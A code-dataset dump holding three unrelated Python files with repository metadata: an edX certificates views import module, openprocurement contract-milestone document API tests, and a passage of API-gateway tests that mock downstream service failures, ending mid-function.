Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/lms/djangoapps/certificates/views/__init__.py
|
osoco/better-ways-of-thinking-about-software
|
83e70d23c873509e22362a09a10d3510e10f6992
|
[
"MIT"
] | 3
|
2021-12-15T04:58:18.000Z
|
2022-02-06T12:15:37.000Z
|
Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/lms/djangoapps/certificates/views/__init__.py
|
osoco/better-ways-of-thinking-about-software
|
83e70d23c873509e22362a09a10d3510e10f6992
|
[
"MIT"
] | null | null | null |
Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/lms/djangoapps/certificates/views/__init__.py
|
osoco/better-ways-of-thinking-about-software
|
83e70d23c873509e22362a09a10d3510e10f6992
|
[
"MIT"
] | 1
|
2019-01-02T14:38:50.000Z
|
2019-01-02T14:38:50.000Z
|
"""
Aggregate all views exposed by the certificates app.
"""
from lms.djangoapps.certificates.views.support import *
from lms.djangoapps.certificates.views.webview import *
| 28.833333
| 55
| 0.797688
| 22
| 173
| 6.272727
| 0.636364
| 0.101449
| 0.246377
| 0.42029
| 0.492754
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104046
| 173
| 5
| 56
| 34.6
| 0.890323
| 0.300578
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e3bb5249ab3051d55799197bde277a72fb8a652b
| 23,087
|
py
|
Python
|
openprocurement/contracting/esco/tests/document_blanks.py
|
VDigitall/openprocurement.contracting.esco
|
8583b05a86655367f3c2942a686a8c57452dc5c4
|
[
"Apache-2.0"
] | null | null | null |
openprocurement/contracting/esco/tests/document_blanks.py
|
VDigitall/openprocurement.contracting.esco
|
8583b05a86655367f3c2942a686a8c57452dc5c4
|
[
"Apache-2.0"
] | 24
|
2018-04-11T08:56:15.000Z
|
2018-06-13T11:38:34.000Z
|
openprocurement/contracting/esco/tests/document_blanks.py
|
VDigitall/openprocurement.contracting.esco
|
8583b05a86655367f3c2942a686a8c57452dc5c4
|
[
"Apache-2.0"
] | 3
|
2017-05-25T10:15:04.000Z
|
2018-03-27T05:35:29.000Z
|
# -*- coding: utf-8 -*-
from email.header import Header
from openprocurement.api.utils import get_now
# ContractDocumentResourceTest
def contract_milestone_document(self):
    """End-to-end check of the multipart-upload document API against milestone states.

    Flow (each step's expectation is asserted inline):
    activate contract -> upload contract doc -> attach it to a pending milestone
    (requires a valid relatedItem) -> updates allowed while pending -> move the
    milestone to 'met' (add/update forbidden) -> 'scheduled' milestone requires a
    pending change for add/update -> 'spare' milestone never accepts documents.
    """
    response = self.app.patch_json('/contracts/{}?acc_token={}'.format(
        self.contract_id, self.contract_token), {"data": {"status": "active"}})
    self.assertEqual(response.status, '200 OK')
    # load document to contract
    response = self.app.post('/contracts/{}/documents?acc_token={}'.format(
        self.contract_id, self.contract_token), upload_files=[('file', str(Header(u'укр.doc', 'utf-8')), 'content')])
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    doc_id = response.json["data"]['id']
    self.assertIn(doc_id, response.headers['Location'])
    self.assertEqual(u'укр.doc', response.json["data"]["title"])
    self.assertEqual(response.json["data"]["documentOf"], "contract")
    self.assertNotIn("documentType", response.json["data"])
    # try to make it milestone's document
    response = self.app.patch_json('/contracts/{}/documents/{}?acc_token={}'.format(
        self.contract_id, doc_id, self.contract_token), {"data": {"documentOf": "milestone"}}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.json['errors'], [
        {"location": "body", "name": "relatedItem", "description": ["This field is required."]}])
    # relatedItem must reference an existing milestone, not an arbitrary id
    response = self.app.patch_json('/contracts/{}/documents/{}?acc_token={}'.format(
        self.contract_id, doc_id, self.contract_token), {"data": {
        "documentOf": "milestone",
        "relatedItem": '1234' * 8}}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.json['errors'], [
        {"location": "body", "name": "relatedItem", "description": ["relatedItem should be one of milestones"]}])
    # get correct milestone id
    response = self.app.get('/contracts/{}'.format(self.contract_id))
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    milestone = response.json['data']['milestones'][0]
    # make sure it's pending milestone!
    self.assertEqual(milestone['status'], 'pending')
    # loading documents to pending milestone is allowed
    response = self.app.patch_json('/contracts/{}/documents/{}?acc_token={}'.format(
        self.contract_id, doc_id, self.contract_token), {"data": {
        "documentOf": "milestone",
        "relatedItem": milestone['id']}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(doc_id, response.json["data"]["id"])
    self.assertEqual(response.json["data"]["documentOf"], 'milestone')
    self.assertEqual(response.json["data"]["relatedItem"], milestone['id'])
    # update docs for pending milestone is allowed
    response = self.app.put('/contracts/{}/documents/{}?acc_token={}'.format(
        self.contract_id, doc_id, self.contract_token),
        upload_files=[('file', 'name name.doc', 'content2')])
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(doc_id, response.json["data"]["id"])
    self.assertNotIn('name name.doc', response.json["data"]["documentOf"])
    self.assertEqual('milestone', response.json["data"]["documentOf"])
    self.assertEqual(milestone['id'], response.json["data"]["relatedItem"])
    # save this document id for later tests
    milestone_doc_id = doc_id
    # set milestone's status to terminal - met for example
    response = self.app.patch_json('/contracts/{}/milestones/{}?acc_token={}'.format(
        self.contract_id, milestone['id'], self.contract_token), {'data': {
        "status": "met",
        "amountPaid": {"amount": 600000}}})
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.json['data']['status'], 'met')
    self.assertEqual(response.json['data']['amountPaid']['amount'], 600000)
    # can't load documents for milestone in met status
    # (the contract-level upload itself still succeeds; only the milestone patch fails)
    response = self.app.post('/contracts/{}/documents?acc_token={}'.format(
        self.contract_id, self.contract_token), upload_files=[('file', str(Header(u'next.doc', 'utf-8')), 'content')])
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    doc_id = response.json["data"]['id']
    self.assertIn(doc_id, response.headers['Location'])
    self.assertEqual(u'next.doc', response.json["data"]["title"])
    self.assertEqual(response.json["data"]["documentOf"], "contract")
    self.assertNotIn("documentType", response.json["data"])
    response = self.app.patch_json('/contracts/{}/documents/{}?acc_token={}'.format(
        self.contract_id, doc_id, self.contract_token), {"data": {
        "documentOf": "milestone",
        "relatedItem": milestone['id']}}, status=403)
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.json['errors'], [
        {"location": "body", "name": "data", "description": "Can't add document in current (met) milestone status"}])
    # update doc (which was loaded earlier) of met milestone is forbidden
    response = self.app.put('/contracts/{}/documents/{}?acc_token={}'.format(
        self.contract_id, milestone_doc_id, self.contract_token),
        upload_files=[('file', 'name name.doc', 'content2')], status=403)
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['errors'], [
        {"location": "body", "name": "data", "description": "Can't update document in current (met) milestone status"}])
    # get scheduled milestone - it's third one (1 - met, 2 - pending, 3 - scheduled)
    response = self.app.get('/contracts/{}'.format(self.contract_id))
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    scheduled_milestone = response.json['data']['milestones'][3]
    # make sure it's scheduled milestone!
    self.assertEqual(scheduled_milestone['status'], 'scheduled')
    # can't load documents for milestone in scheduled status w/o pending change
    response = self.app.patch_json('/contracts/{}/documents/{}?acc_token={}'.format(
        self.contract_id, doc_id, self.contract_token), {"data": {
        "documentOf": "milestone",
        "relatedItem": scheduled_milestone['id']}}, status=403)
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.json['errors'], [
        {"location": "body", "name": "data",
         "description": "Can't add document to scheduled milestone without pending change"}])
    # create pending change
    response = self.app.post_json('/contracts/{}/changes?acc_token={}'.format(
        self.contract_id, self.contract_token), {'data': {
        'rationale': u'причина зміни укр',
        'rationale_en': 'change cause en',
        'rationaleTypes': ['itemPriceVariation']}})
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['data']['status'], 'pending')
    change = response.json['data']
    # now loading docs for scheduled milestone is allowed
    response = self.app.patch_json('/contracts/{}/documents/{}?acc_token={}'.format(
        self.contract_id, doc_id, self.contract_token), {"data": {
        "documentOf": "milestone",
        "relatedItem": scheduled_milestone['id']}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(doc_id, response.json["data"]["id"])
    self.assertEqual(response.json["data"]["documentOf"], 'milestone')
    self.assertEqual(response.json["data"]["relatedItem"], scheduled_milestone['id'])
    # update docs for scheduled milestone with pending change is allowed
    response = self.app.put('/contracts/{}/documents/{}?acc_token={}'.format(
        self.contract_id, doc_id, self.contract_token),
        upload_files=[('file', 'name name name.doc', 'content2')])
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(doc_id, response.json["data"]["id"])
    self.assertNotIn('name name name.doc', response.json["data"]["documentOf"])
    self.assertEqual('milestone', response.json["data"]["documentOf"])
    self.assertEqual(scheduled_milestone['id'], response.json["data"]["relatedItem"])
    # activate change
    response = self.app.patch_json('/contracts/{}/changes/{}?acc_token={}'.format(
        self.contract_id, change['id'], self.contract_token), {'data': {
        'status': 'active',
        'dateSigned': get_now().isoformat()}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.json['data']['status'], 'active')
    # update docs for scheduled milestone is not allowed without pending change
    response = self.app.put('/contracts/{}/documents/{}?acc_token={}'.format(
        self.contract_id, doc_id, self.contract_token),
        upload_files=[('file', 'name name name.doc', 'content2')], status=403)
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.json['errors'], [
        {"location": "body", "name": "data",
         "description": "Can't update document to scheduled milestone without pending change"}])
    # can't load documents to spare milestone
    spare_milestone = self.initial_data['milestones'][-2]
    self.assertEqual(spare_milestone['status'], 'spare')
    response = self.app.patch_json('/contracts/{}/documents/{}?acc_token={}'.format(
        self.contract_id, doc_id, self.contract_token), {"data": {
        "documentOf": "milestone",
        "relatedItem": spare_milestone['id']}}, status=403)
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.json['errors'], [
        {"location": "body", "name": "data", "description": "Can't add document in current (spare) milestone status"}])
def milestone_document_json(self):
    """Docservice (JSON-body) counterpart of the milestone document tests.

    Same state machine as the multipart version, but documents are registered
    via post_json/put_json with docservice URLs: invalid relatedItem rejected ->
    pending milestone accepts add/update -> 'met' forbids both -> 'scheduled'
    needs a pending change -> 'spare' never accepts documents. Also verifies the
    signed docservice URL fields (Signature=/KeyID= present, Expires= absent).
    """
    # load document to "some id" milestone
    response = self.app.post_json('/contracts/{}/documents?acc_token={}'.format(
        self.contract_id, self.contract_token), {'data': {
        'title': u'укр.doc',
        'url': self.generate_docservice_url(),
        'hash': 'md5:' + '0' * 32,
        'format': 'application/msword',
        'documentOf': 'milestone',
        'relatedItem': '1234' * 8}}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.json['errors'], [
        {"location": "body", "name": "relatedItem", "description": ["relatedItem should be one of milestones"]}])
    # get correct milestone id
    response = self.app.get('/contracts/{}'.format(self.contract_id))
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    milestone = response.json['data']['milestones'][0]
    # make sure it's pending milestone!
    self.assertEqual(milestone['status'], 'pending')
    # load docs to pending milestone is allowed
    response = self.app.post_json('/contracts/{}/documents?acc_token={}'.format(
        self.contract_id, self.contract_token), {'data': {
        'title': u'укр.doc',
        'url': self.generate_docservice_url(),
        'hash': 'md5:' + '0' * 32,
        'format': 'application/msword',
        'documentOf': 'milestone',
        'relatedItem': milestone['id']}})
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    doc_id = response.json["data"]['id']
    self.assertIn(doc_id, response.headers['Location'])
    self.assertEqual(u'укр.doc', response.json["data"]["title"])
    self.assertEqual('milestone', response.json["data"]["documentOf"])
    self.assertEqual(milestone['id'], response.json["data"]["relatedItem"])
    # the returned URL is docservice-signed but not expiring
    self.assertIn('Signature=', response.json["data"]["url"])
    self.assertIn('KeyID=', response.json["data"]["url"])
    self.assertNotIn('Expires=', response.json["data"]["url"])
    # the stored document in the DB carries the same signed URL
    key = response.json["data"]["url"].split('/')[-1].split('?')[0]
    contract = self.db.get(self.contract_id)
    self.assertIn(key, contract['documents'][-1]["url"])
    self.assertIn('Signature=', contract['documents'][-1]["url"])
    self.assertIn('KeyID=', contract['documents'][-1]["url"])
    self.assertNotIn('Expires=', contract['documents'][-1]["url"])
    response = self.app.get('/contracts/{}/documents/{}'.format(
        self.contract_id, doc_id))
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(doc_id, response.json["data"]["id"])
    self.assertEqual(u'укр.doc', response.json["data"]["title"])
    self.assertEqual('milestone', response.json["data"]["documentOf"])
    self.assertEqual(milestone['id'], response.json["data"]["relatedItem"])
    # update of docs of pending milestone is allowed
    response = self.app.put_json('/contracts/{}/documents/{}?acc_token={}'.format(
        self.contract_id, doc_id, self.contract_token), {'data': {
        'title': u'name.doc',
        'url': self.generate_docservice_url(),
        'hash': 'md5:' + '0' * 32,
        'format': 'application/msword', }})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(doc_id, response.json["data"]["id"])
    self.assertIn('Signature=', response.json["data"]["url"])
    self.assertIn('KeyID=', response.json["data"]["url"])
    self.assertNotIn('Expires=', response.json["data"]["url"])
    self.assertEqual('milestone', response.json["data"]["documentOf"])
    self.assertEqual(milestone['id'], response.json["data"]["relatedItem"])
    # set milestone's status to terminal - met for example
    response = self.app.patch_json('/contracts/{}/milestones/{}?acc_token={}'.format(
        self.contract_id, milestone['id'], self.contract_token), {'data': {
        "status": "met",
        "amountPaid": {"amount": 600000}}})
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.json['data']['status'], 'met')
    self.assertEqual(response.json['data']['amountPaid']['amount'], 600000)
    # adding a doc to a met milestone is forbidden
    response = self.app.post_json('/contracts/{}/documents?acc_token={}'.format(
        self.contract_id, self.contract_token), {'data': {
        'title': u'name name.doc',
        'url': self.generate_docservice_url(),
        'hash': 'md5:' + '0' * 32,
        'format': 'application/msword',
        'documentOf': 'milestone',
        'relatedItem': milestone['id']}}, status=403)
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.json['errors'], [
        {"location": "body", "name": "data", "description": "Can't add document in current (met) milestone status"}])
    # update of docs of met milestone is not allowed
    response = self.app.put_json('/contracts/{}/documents/{}?acc_token={}'.format(
        self.contract_id, doc_id, self.contract_token), {'data': {
        'title': u'name.doc',
        'url': self.generate_docservice_url(),
        'hash': 'md5:' + '0' * 32,
        'format': 'application/msword',
        'documentOf': 'milestone',
        'relatedItem': milestone['id']}}, status=403)
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.json['errors'], [
        {"location": "body", "name": "data", "description": "Can't update document in current (met) milestone status"}])
    # get scheduled milestone - it's third one (1 - met, 2 - pending, 3 - scheduled)
    response = self.app.get('/contracts/{}'.format(self.contract_id))
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    scheduled_milestone = response.json['data']['milestones'][3]
    # make sure it's scheduled milestone!
    self.assertEqual(scheduled_milestone['status'], 'scheduled')
    # can't load documents for milestone in scheduled status w/o pending change
    response = self.app.post_json('/contracts/{}/documents?acc_token={}'.format(
        self.contract_id, self.contract_token), {'data': {
        'title': u'укр.doc',
        'url': self.generate_docservice_url(),
        'hash': 'md5:' + '0' * 32,
        'format': 'application/msword',
        'documentOf': 'milestone',
        'relatedItem': scheduled_milestone['id']}}, status=403)
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.json['errors'], [
        {"location": "body", "name": "data",
         "description": "Can't add document to scheduled milestone without pending change"}])
    # create pending change
    response = self.app.post_json('/contracts/{}/changes?acc_token={}'.format(
        self.contract_id, self.contract_token), {'data': {
        'rationale': u'причина зміни укр',
        'rationale_en': 'change cause en',
        'rationaleTypes': ['itemPriceVariation']}})
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['data']['status'], 'pending')
    change = response.json['data']
    # now loading docs for scheduled milestone is allowed
    response = self.app.post_json('/contracts/{}/documents?acc_token={}'.format(
        self.contract_id, self.contract_token), {'data': {
        'title': u'укр.doc',
        'url': self.generate_docservice_url(),
        'hash': 'md5:' + '0' * 32,
        'format': 'application/msword',
        'documentOf': 'milestone',
        'relatedItem': scheduled_milestone['id']}})
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    doc_id = response.json["data"]['id']
    self.assertIn(doc_id, response.headers['Location'])
    self.assertEqual(u'укр.doc', response.json["data"]["title"])
    self.assertEqual('milestone', response.json["data"]["documentOf"])
    self.assertEqual(scheduled_milestone['id'], response.json["data"]["relatedItem"])
    self.assertIn('Signature=', response.json["data"]["url"])
    self.assertIn('KeyID=', response.json["data"]["url"])
    self.assertNotIn('Expires=', response.json["data"]["url"])
    key = response.json["data"]["url"].split('/')[-1].split('?')[0]
    contract = self.db.get(self.contract_id)
    self.assertIn(key, contract['documents'][-1]["url"])
    self.assertIn('Signature=', contract['documents'][-1]["url"])
    self.assertIn('KeyID=', contract['documents'][-1]["url"])
    self.assertNotIn('Expires=', contract['documents'][-1]["url"])
    response = self.app.get('/contracts/{}/documents/{}'.format(
        self.contract_id, doc_id))
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(doc_id, response.json["data"]["id"])
    self.assertEqual(u'укр.doc', response.json["data"]["title"])
    self.assertEqual('milestone', response.json["data"]["documentOf"])
    self.assertEqual(scheduled_milestone['id'], response.json["data"]["relatedItem"])
    # update docs for scheduled milestone is allowed with pending change
    response = self.app.put_json('/contracts/{}/documents/{}?acc_token={}'.format(
        self.contract_id, doc_id, self.contract_token), {'data': {
        'title': u'name name.doc',
        'url': self.generate_docservice_url(),
        'hash': 'md5:' + '0' * 32,
        'format': 'application/msword'}}, status=200)
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(doc_id, response.json["data"]["id"])
    self.assertEqual(u'name name.doc', response.json["data"]["title"])
    self.assertIn('Signature=', response.json["data"]["url"])
    self.assertIn('KeyID=', response.json["data"]["url"])
    self.assertNotIn('Expires=', response.json["data"]["url"])
    self.assertEqual('milestone', response.json["data"]["documentOf"])
    self.assertEqual(scheduled_milestone['id'], response.json["data"]["relatedItem"])
    # activate change - now there is no pending changes
    response = self.app.patch_json('/contracts/{}/changes/{}?acc_token={}'.format(
        self.contract_id, change['id'], self.contract_token), {'data': {
        'status': 'active',
        'dateSigned': get_now().isoformat()}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.json['data']['status'], 'active')
    # update docs for scheduled milestone is not allowed without pending change
    response = self.app.put_json('/contracts/{}/documents/{}?acc_token={}'.format(
        self.contract_id, doc_id, self.contract_token), {'data': {
        'title': u'name name name.doc',
        'url': self.generate_docservice_url(),
        'hash': 'md5:' + '0' * 32,
        'format': 'application/msword'}}, status=403)
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.json['errors'], [
        {"location": "body", "name": "data",
         "description": "Can't update document to scheduled milestone without pending change"}])
    # can't load documents to spare milestone
    spare_milestone = self.initial_data['milestones'][-2]
    self.assertEqual(spare_milestone['status'], 'spare')
    response = self.app.post_json('/contracts/{}/documents?acc_token={}'.format(
        self.contract_id, self.contract_token), {'data': {
        'title': u'укр.doc',
        'url': self.generate_docservice_url(),
        'hash': 'md5:' + '0' * 32,
        'format': 'application/msword',
        'documentOf': 'milestone',
        'relatedItem': spare_milestone['id']}}, status=403)
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.json['errors'], [
        {"location": "body", "name": "data", "description": "Can't add document in current (spare) milestone status"}])
| 53.815851
| 120
| 0.657123
| 2,625
| 23,087
| 5.686095
| 0.057905
| 0.130645
| 0.143307
| 0.048238
| 0.966635
| 0.962214
| 0.953303
| 0.949015
| 0.945531
| 0.942181
| 0
| 0.013212
| 0.164032
| 23,087
| 428
| 121
| 53.941589
| 0.760155
| 0.074198
| 0
| 0.893678
| 0
| 0
| 0.287777
| 0.054978
| 0
| 0
| 0
| 0
| 0.454023
| 1
| 0.005747
| false
| 0
| 0.005747
| 0
| 0.011494
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e3d500bace39d7f1bea13ca84e24558558df805a
| 22,178
|
py
|
Python
|
netflix/services/api-gateway/tests/test_app.py
|
filibuster-testing/filibuster-corpus
|
225ee0017005801bee591137f82117fe37a0f899
|
[
"Apache-2.0"
] | 7
|
2021-11-01T21:09:47.000Z
|
2022-03-16T20:38:57.000Z
|
netflix/services/api-gateway/tests/test_app.py
|
filibuster-testing/filibuster-corpus
|
225ee0017005801bee591137f82117fe37a0f899
|
[
"Apache-2.0"
] | null | null | null |
netflix/services/api-gateway/tests/test_app.py
|
filibuster-testing/filibuster-corpus
|
225ee0017005801bee591137f82117fe37a0f899
|
[
"Apache-2.0"
] | null | null | null |
import requests
import os
import sys
import enum
import importlib

# Use the stdlib mock on Python >= 3.3, the external backport otherwise.
# Compare the (major, minor) tuple: the original
# `version_info[0] >= 3 and version_info[1] >= 3` test misclassifies
# versions such as 3.2 (passes major check, fails minor) and 4.1.
if sys.version_info[:2] >= (3, 3):
    from unittest import mock
else:
    import mock
sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))
# "api-gateway" contains a hyphen, so `from api-gateway.app import app`
# is a SyntaxError; the package can only be loaded dynamically.
app = importlib.import_module("api-gateway.app").app
parent_path = os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))))
sys.path.append(parent_path)
import helper

# Shared test helper that resolves base URLs for the "netflix" services.
helper = helper.Helper("netflix")
class MockFailure(enum.Enum):
    """Failure scenarios injected into the mocked requests.get/post calls.

    Plain members fail a single downstream service; compound members
    (e.g. BOOKMARKS_FAIL_TRENDING_FAIL) make several services fail within
    the same test.  Values 1-2 are skipped — presumably removed scenarios.
    """
    SUCCESS = 0
    USER_PROFILE_FAIL = 3
    USER_PROFILE_TIMEOUT = 4
    USER_PROFILE_NOT_FOUND = 5
    BOOKMARKS_FAIL = 6
    BOOKMARKS_TIMEOUT = 7
    BOOKMARKS_NOT_FOUND = 8
    # bookmarks failure combined with a failure of its fallback/side calls
    BOOKMARKS_FAIL_TRENDING_FAIL = 9
    BOOKMARKS_FAIL_TRENDING_TIMEOUT = 10
    BOOKMARKS_FAIL_TELEMETRY_FAIL = 11
    BOOKMARKS_FAIL_TELEMETRY_TIMEOUT = 12
    MY_LIST_FAIL = 13
    MY_LIST_TIMEOUT = 14
    MY_LIST_NOT_FOUND = 15
    USER_REC_FAIL = 16
    USER_REC_TIMEOUT = 17
    USER_REC_NOT_FOUND = 18
    # user-recommendations failure cascading into its fallbacks
    USER_REC_FAIL_GLOBAL_REC_FAIL = 19
    USER_REC_FAIL_GLOBAL_REC_TIMEOUT = 20
    USER_REC_FAIL_GLOBAL_REC_FAIL_TRENDING_FAIL = 21
    USER_REC_FAIL_GLOBAL_REC_FAIL_TRENDING_TIMEOUT = 22
    RATINGS_FAIL = 23
    RATINGS_TIMEOUT = 24
    RATINGS_NOT_FOUND = 25
class MockResponse:
    """Minimal stand-in for requests.Response: payload plus status code."""

    def __init__(self, data, status_code):
        self.status_code = status_code
        self.data = data

    def json(self):
        """Return the canned payload, mirroring requests.Response.json()."""
        return self.data
def mock_requests_get_with_failure_setting(failure_setting):
    """Build a requests.get replacement that simulates `failure_setting`.

    The returned callable matches the positional URL argument against each
    known downstream service and either raises ConnectionError/Timeout,
    returns the canned payload with a 404 status, or returns it with 200.
    A URL matching no known service falls through and returns None.
    """
    def mock_requests_get(*args, **kwargs):
        # user-profile: FAIL/TIMEOUT raise; NOT_FOUND -> 404 (payload still attached).
        user_profile_request = "{}/users/chris_rivers".format(helper.get_service_url("user-profile"))
        if args == (user_profile_request,):
            if failure_setting == MockFailure.USER_PROFILE_FAIL:
                raise requests.exceptions.ConnectionError
            elif failure_setting == MockFailure.USER_PROFILE_TIMEOUT:
                raise requests.exceptions.Timeout
            elif failure_setting == MockFailure.USER_PROFILE_NOT_FOUND:
                status_code = 404
            else:
                status_code = 200
            return MockResponse(USER_PROFILE_RESPONSE, status_code)
        # bookmarks: every BOOKMARKS_FAIL_* compound scenario raises here too.
        bookmarks_request = "{}/users/chris_rivers".format(helper.get_service_url("bookmarks"))
        if args == (bookmarks_request,):
            if failure_setting in [MockFailure.BOOKMARKS_FAIL, MockFailure.BOOKMARKS_FAIL_TRENDING_FAIL, MockFailure.BOOKMARKS_FAIL_TRENDING_TIMEOUT, MockFailure.BOOKMARKS_FAIL_TELEMETRY_FAIL, MockFailure.BOOKMARKS_FAIL_TELEMETRY_TIMEOUT]:
                raise requests.exceptions.ConnectionError
            elif failure_setting == MockFailure.BOOKMARKS_TIMEOUT:
                raise requests.exceptions.Timeout
            elif failure_setting == MockFailure.BOOKMARKS_NOT_FOUND:
                status_code = 404
            else:
                status_code = 200
            return MockResponse(BOOKMARKS_RESPONSE, status_code)
        # trending (no per-user path): only fails in the compound scenarios.
        trending_request = helper.get_service_url("trending")
        if args == (trending_request,):
            if failure_setting in [MockFailure.BOOKMARKS_FAIL_TRENDING_FAIL, MockFailure.USER_REC_FAIL_GLOBAL_REC_FAIL_TRENDING_FAIL]:
                raise requests.exceptions.ConnectionError
            elif failure_setting in [MockFailure.BOOKMARKS_FAIL_TRENDING_TIMEOUT, MockFailure.USER_REC_FAIL_GLOBAL_REC_FAIL_TRENDING_TIMEOUT]:
                raise requests.exceptions.Timeout
            else:
                status_code = 200
            return MockResponse(TRENDING_RESPONSE, status_code)
        # my-list: simple FAIL/TIMEOUT/NOT_FOUND triple.
        my_list_request = "{}/users/chris_rivers".format(helper.get_service_url("my-list"))
        if args == (my_list_request,):
            if failure_setting == MockFailure.MY_LIST_FAIL:
                raise requests.exceptions.ConnectionError
            elif failure_setting == MockFailure.MY_LIST_TIMEOUT:
                raise requests.exceptions.Timeout
            elif failure_setting == MockFailure.MY_LIST_NOT_FOUND:
                status_code = 404
            else:
                status_code = 200
            return MockResponse(MY_LIST_RESPONSE, status_code)
        # user-recommendations: all USER_REC_FAIL* compound scenarios raise.
        user_rec_request = "{}/users/chris_rivers".format(helper.get_service_url("user-recommendations"))
        if args == (user_rec_request,):
            if failure_setting in [MockFailure.USER_REC_FAIL, MockFailure.USER_REC_FAIL_GLOBAL_REC_FAIL, MockFailure.USER_REC_FAIL_GLOBAL_REC_TIMEOUT, MockFailure.USER_REC_FAIL_GLOBAL_REC_FAIL_TRENDING_FAIL, MockFailure.USER_REC_FAIL_GLOBAL_REC_FAIL_TRENDING_TIMEOUT]:
                raise requests.exceptions.ConnectionError
            elif failure_setting == MockFailure.USER_REC_TIMEOUT:
                raise requests.exceptions.Timeout
            elif failure_setting == MockFailure.USER_REC_NOT_FOUND:
                status_code = 404
            else:
                status_code = 200
            return MockResponse(USER_REC_RESPONSE, status_code)
        # global-recommendations: the fallback for user-recommendations.
        global_rec_request = helper.get_service_url("global-recommendations")
        if args == (global_rec_request,):
            if failure_setting in [MockFailure.USER_REC_FAIL_GLOBAL_REC_FAIL, MockFailure.USER_REC_FAIL_GLOBAL_REC_FAIL_TRENDING_FAIL, MockFailure.USER_REC_FAIL_GLOBAL_REC_FAIL_TRENDING_TIMEOUT]:
                raise requests.exceptions.ConnectionError
            elif failure_setting == MockFailure.USER_REC_FAIL_GLOBAL_REC_TIMEOUT:
                raise requests.exceptions.Timeout
            else:
                status_code = 200
            return MockResponse(GLOBAL_REC_RESPONSE, status_code)
        # ratings: simple FAIL/TIMEOUT/NOT_FOUND triple.
        ratings_request = "{}/users/chris_rivers".format(helper.get_service_url("ratings"))
        if args == (ratings_request,):
            if failure_setting == MockFailure.RATINGS_FAIL:
                raise requests.exceptions.ConnectionError
            elif failure_setting == MockFailure.RATINGS_TIMEOUT:
                raise requests.exceptions.Timeout
            elif failure_setting == MockFailure.RATINGS_NOT_FOUND:
                status_code = 404
            else:
                status_code = 200
            return MockResponse(RATINGS_RESPONSE, status_code)
    return mock_requests_get
def mock_requests_post_with_failure_setting(failure_setting):
